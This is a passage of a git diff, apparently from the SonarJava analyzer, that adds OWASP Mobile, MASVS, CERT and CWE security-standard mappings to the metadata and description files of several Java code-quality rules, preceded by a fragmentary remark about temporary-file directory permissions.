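`File.createTempFile(..., new File("/mySecureDirectory"))`, is only compliant if that directory's permissions are restrictive, which the example could state.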
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
index 81cb79edaac..408b8922ca5 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
@@ -11,7 +11,8 @@
"privacy",
"owasp-a6",
"ssl",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5527",
@@ -25,6 +26,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-3"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
index c0100350a4a..a31fbf0eaf6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
@@ -33,6 +33,10 @@ See
- OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
- CERT, MSC61-J. - Do not use insecure or weak cryptographic algorithms
- SANS Top 25 - Porous Defenses
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
index af799b11da3..e6da37e4cc4 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
@@ -9,10 +9,10 @@
"tags": [
"cwe",
"privacy",
- "cert",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5542",
@@ -26,6 +26,15 @@
"OWASP": [
"A6",
"A3"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
index a382beef575..830fa089200 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
@@ -50,6 +50,10 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
- CERT, MSC61-J. - Do not use insecure or weak cryptographic algorithms
- SANS Top 25 - Porous Defenses
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
index 3e82db14459..6f65651a9ce 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.json
@@ -9,10 +9,10 @@
"tags": [
"cwe",
"privacy",
- "cert",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5547",
@@ -26,6 +26,15 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
index 1f2b0a63f02..03b7538e4e0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5738_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
477
+ ],
+ "CERT": [
+ "MET02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
index b24d62616c4..818e62571f2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.html
@@ -104,6 +104,7 @@ See
- OWASP Top 10 2017 Category A1 - Injection
- MITRE, CWE-400 - Uncontrolled Resource Consumption
+ - MITRE, CWE-1333 - Inefficient Regular Expression Complexity
- owasp.org - OWASP Regular expression Denial
of Service - ReDoS
- stackstatus.net - Outage Postmortem - July 20, 2016
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
index 8ad0e55721b..b97498d145c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5852_java.json
@@ -17,7 +17,8 @@
"scope": "All",
"securityStandards": {
"CWE": [
- 400
+ 400,
+ 1333
],
"OWASP": [
"A1"
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
index 625d91a9daf..dd8314782f9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S818_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-818",
"sqKey": "S818",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL16-C.",
+ "DCL50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
index 89c345ccc5d..db70d52caed 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S864_java.json
@@ -17,6 +17,11 @@
"securityStandards": {
"CWE": [
783
+ ],
+ "CERT": [
+ "EXP00-C.",
+ "EXP00-CPP.",
+ "EXP53-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
index b1c964c14ae..86c398601b9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S881_java.json
@@ -12,5 +12,12 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-881",
"sqKey": "S881",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP30-C.",
+ "EXP50-CPP.",
+ "EXP05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
index b74499033c3..9114b5bcbe9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S888_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
835
+ ],
+ "CERT": [
+ "MSC21-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
index 4feb7e8ef11..f4ceff6fd96 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S899_java.json
@@ -18,6 +18,13 @@
"securityStandards": {
"CWE": [
754
+ ],
+ "CERT": [
+ "EXP00-J.",
+ "EXP12-C.",
+ "FIO02-J.",
+ "ERR33-C.",
+ "POS54-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
index b879f69bbe7..aa6c4b7e0a3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S923_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Info",
"ruleSpecification": "RSPEC-923",
"sqKey": "S923",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL50-CPP."
+ ]
+ }
}
diff --git a/sonarpedia.json b/sonarpedia.json
index 82abed61a84..86a8d86ca87 100644
--- a/sonarpedia.json
+++ b/sonarpedia.json
@@ -3,7 +3,7 @@
"languages": [
"JAVA"
],
- "latest-update": "2021-06-07T12:45:20.306737833Z",
+ "latest-update": "2021-06-25T11:15:59.148768Z",
"options": {
"no-language-in-filenames": false,
"preserve-filenames": false